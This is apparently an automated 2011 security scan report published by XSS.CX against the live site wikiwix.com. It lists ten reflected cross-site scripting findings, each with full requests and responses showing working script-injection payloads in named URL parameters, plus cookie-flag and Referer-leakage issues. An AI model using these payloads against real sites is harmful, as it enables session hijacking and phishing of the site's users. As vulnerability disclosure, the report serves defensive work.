XSS, wikiwix.com, Cross Site Scripting, CWE-79, CAPEC-86

http://wikiwix.com/index.php?art=truec28e3%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E1371610c7db&action=xss.cx&lang=en&disp=article

Report generated by XSS.CX at Wed Apr 06 20:58:20 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://wikiwix.com/ [action parameter]

1.2. http://wikiwix.com/ [action parameter]

1.3. http://wikiwix.com/ajax/dncomplete.php [q parameter]

1.4. http://wikiwix.com/ajax/dncomplete.php [q parameter]

1.5. http://wikiwix.com/ajax/dncomplete.php [token parameter]

1.6. http://wikiwix.com/index.php [action parameter]

1.7. http://wikiwix.com/index.php [art parameter]

1.8. http://wikiwix.com/index.php [disp parameter]

1.9. http://wikiwix.com/index.php [lang parameter]

1.10. http://wikiwix.com/index.php [name of an arbitrarily supplied request parameter]

2. Cookie without HttpOnly flag set

3. Cross-domain Referer leakage

3.1. http://wikiwix.com/

3.2. http://wikiwix.com/index.php

3.3. http://wikiwix.com/index.php

3.4. http://wikiwix.com/index.php

3.5. http://wikiwix.com/index.php

3.6. http://wikiwix.com/index.php

3.7. http://wikiwix.com/index.php

3.8. http://wikiwix.com/index.php

3.9. http://wikiwix.com/index.php

3.10. http://wikiwix.com/index.php

4. Cross-domain script include

4.1. http://wikiwix.com/

4.2. http://wikiwix.com/index.php

4.3. http://wikiwix.com/index.php

4.4. http://wikiwix.com/timeline/timeline-api.js

5. Content type incorrectly stated

5.1. http://wikiwix.com/timeline/data/4-7/en-1-4576656e7473.xml

5.2. http://wikiwix.com/timeline/data/4-7/en-2-426972746873.xml

5.3. http://wikiwix.com/timeline/data/4-7/en-3-446561746873.xml



1. Cross-site scripting (reflected)  next
There are 10 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://wikiwix.com/ [action parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /

Issue detail

The value of the action request parameter is copied into the HTML document as text between TITLE tags. The payload d1b29</title><script>alert(1)</script>5d1d80a3acf was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?art=true&action=d1b29</title><script>alert(1)</script>5d1d80a3acf&lang=en HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:11 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7915
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
<title>Wikiwix .. Wikipedia - d1b29</title><script>alert(1)</script>5d1d80a3acf</title>
...[SNIP]...

1.2. http://wikiwix.com/ [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f00cf</script><script>alert(1)</script>9614e918e1 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?art=true&action=f00cf</script><script>alert(1)</script>9614e918e1&lang=en HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:01 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7915
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
<script type='text/javascript' charset='utf-8'>
var pageOptions = {
'pubId' : 'pub-0854546685562041',
'query' : 'f00cf</script><script>alert(1)</script>9614e918e1',
'channel' : '7809326477',
'hl' : 'en',
}

var adblock1 = {
'container' : 'googlebox',
'number' : 2,
'width' : 'auto',
'lines' : 2,

'oe' : 'utf8',
'ie' : 'utf8',
'fontFamily' : 'arial',

...[SNIP]...

1.3. http://wikiwix.com/ajax/dncomplete.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /ajax/dncomplete.php

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d25"><script>alert(1)</script>3ee6d546b30 was submitted in the q parameter. This input was echoed as 94d25\\\"><script>alert(1)</script>3ee6d546b30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajax/dncomplete.php?q=x94d25"><script>alert(1)</script>3ee6d546b30&token=1 HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/?art=true&action=&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:53:37 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 727
Content-Type: text/html; charset=UTF-8

<!-- token=1 --><ul><li style="background:#eef;"><a href="http://www.wikiwix.com/?action=x94d25\\\"><script>alert(1)</script>3ee6d546b30" onKeyDown="return dn_auto_complete_continue(this,event);" onClick="document.qsearch.submit();return false;" onKeyPress="return arrow_catch(event)">
...[SNIP]...

1.4. http://wikiwix.com/ajax/dncomplete.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /ajax/dncomplete.php

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 8a241<script>alert(1)</script>a40d43525e8 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajax/dncomplete.php?q=x8a241<script>alert(1)</script>a40d43525e8&token=1 HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/?art=true&action=&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:53:40 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 707
Content-Type: text/html; charset=UTF-8

<!-- token=1 --><ul><li style="background:#eef;"><a href="http://www.wikiwix.com/?action=x8a241<script>alert(1)</script>a40d43525e8" onKeyDown="return dn_auto_complete_continue(this,event);" onClick="
...[SNIP]...
<span class="dn_prefix">x8a241<script>alert(1)</script>a40d43525e8</span>
...[SNIP]...

1.5. http://wikiwix.com/ajax/dncomplete.php [token parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /ajax/dncomplete.php

Issue detail

The value of the token request parameter is copied into an HTML comment. The payload bbd2f--><script>alert(1)</script>d2a9a89a2ff was submitted in the token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ajax/dncomplete.php?q=x&token=1bbd2f--><script>alert(1)</script>d2a9a89a2ff HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/?art=true&action=&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:53:55 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1981
Content-Type: text/html; charset=UTF-8

<!-- token=1bbd2f--><script>alert(1)</script>d2a9a89a2ff --><ul><li><a href="http://dnc.wikiwix.com/click.php?url=www.xvideos.com/" target="_blank" onClick="return dn_clicked();" onKeyDown="return dn_
...[SNIP]...

1.6. http://wikiwix.com/index.php [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The value of the action request parameter is copied into the HTML document as text between TITLE tags. The payload 40f2c</title><script>alert(1)</script>0816135212a was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?map=true&lang=en&action=xss.cx40f2c</title><script>alert(1)</script>0816135212a&disp=article HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?art=true&action=xss.cx&lang=en&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:03 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6616
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta h
...[SNIP]...
<title>Wikiwix .. Wikipedia - xss.cx40f2c</title><script>alert(1)</script>0816135212a</title>
...[SNIP]...

1.7. http://wikiwix.com/index.php [art parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The value of the art request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c28e3"><script>alert(1)</script>1371610c7db was submitted in the art parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?art=truec28e3"><script>alert(1)</script>1371610c7db&action=xss.cx&lang=en&disp=article HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/?art=true&action=&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:54:24 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 46765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
<a        href="/index.php?art=truec28e3"><script>alert(1)</script>1371610c7db&amp;action=xss.cx&amp;lang=en&amp;disp=article&amp;page=2">
...[SNIP]...

1.8. http://wikiwix.com/index.php [disp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The value of the disp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5eb1"><script>alert(1)</script>6140c0593fa was submitted in the disp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?lang=en&img=true&action=xss.cx&disp=commonsd5eb1"><script>alert(1)</script>6140c0593fa HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?map=true&lang=en&action=xss.cx&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:40 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 12752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:php="http://php.net/xsl">
<head xmlns="http://www.w3.org/1999/xhtml"><meta htt
...[SNIP]...
<a        href="/index.php?lang=en&amp;img=true&amp;action=xss.cx&amp;disp=commonsd5eb1"><script>alert(1)</script>6140c0593fa&amp;page=2">
...[SNIP]...

1.9. http://wikiwix.com/index.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9cbf"><script>alert(1)</script>f45f5067f0d was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?lang=enf9cbf"><script>alert(1)</script>f45f5067f0d&action=xss.cx HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?art=true&action=xss.cx&lang=en&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:49 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 46656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
<a        href="/index.php?lang=enf9cbf"><script>alert(1)</script>f45f5067f0d&amp;action=xss.cx&amp;page=2">
...[SNIP]...

1.10. http://wikiwix.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ece69"><script>alert(1)</script>63dde9c0f60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?lang=en&img=true&action=xss.cx&disp=com/ece69"><script>alert(1)</script>63dde9c0f60mons HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?map=true&lang=en&action=xss.cx&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:56:02 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 12757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:php="http://php.net/xsl">
<head xmlns="http://www.w3.org/1999/xhtml"><meta htt
...[SNIP]...
<a        href="/index.php?lang=en&amp;img=true&amp;action=xss.cx&amp;disp=com/ece69"><script>alert(1)</script>63dde9c0f60mons&amp;page=2">
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://wikiwix.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:52:29 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: PHPSESSID=e6fdab1b2eae2694a6748ab2995db548; expires=Fri, 08 Apr 2011 01:52:29 GMT; path=/; domain=.wikiwix.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5800
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:php="http://php.net/xsl">
<head xmlns="http://www.w3.org/1999/xhtml"><meta htt
...[SNIP]...

3. Cross-domain Referer leakage  previous  next
There are 10 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://wikiwix.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?art=true&action=&lang=en HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:53:01 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7026
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
</script><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><a href="http://www.okawix.com" class="wikiondvd" title="Okawix, offline reader"></a><a href="http://en.wikiactu.com/" class="wikiactu" title="Wikinews blog"></a>
...[SNIP]...
<li><a href="http://www.okawix.com/" style="border:0;"><img src="images/download-okawix.png" style="margin-left:10%;"/>
...[SNIP]...
<p>This project is developed by Linterweb, with the financial support of <a href="http://www.oseo.fr/"><img src="images/oseo.gif" style="width:100px;padding-left:5px;position:relative;top:10px;" alt="OSEO"></a>. It is hosted by the <a href="http://www.crihan.fr/">CRIHAN</a>
...[SNIP]...

3.2. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?lang=en&action=xss.cx&disp=versity HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?map=true&lang=en&action=xss.cx&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:54:58 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 44520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
</script><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><a href="http://www.okawix.com" class="wikiondvd" title="Okawix, offline reader"></a><a href="http://en.wikiactu.com/" class="wikiactu" title="Wikinews blog"></a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Learning_Projects">Learning Projects</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Education">Education</a></li>
<li><a href="http://en.wikipedia.org/wiki/Portal:Engineering_and_Technology">Engineering and Technology</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Wikisphere">Wikisphere</a>
...[SNIP]...
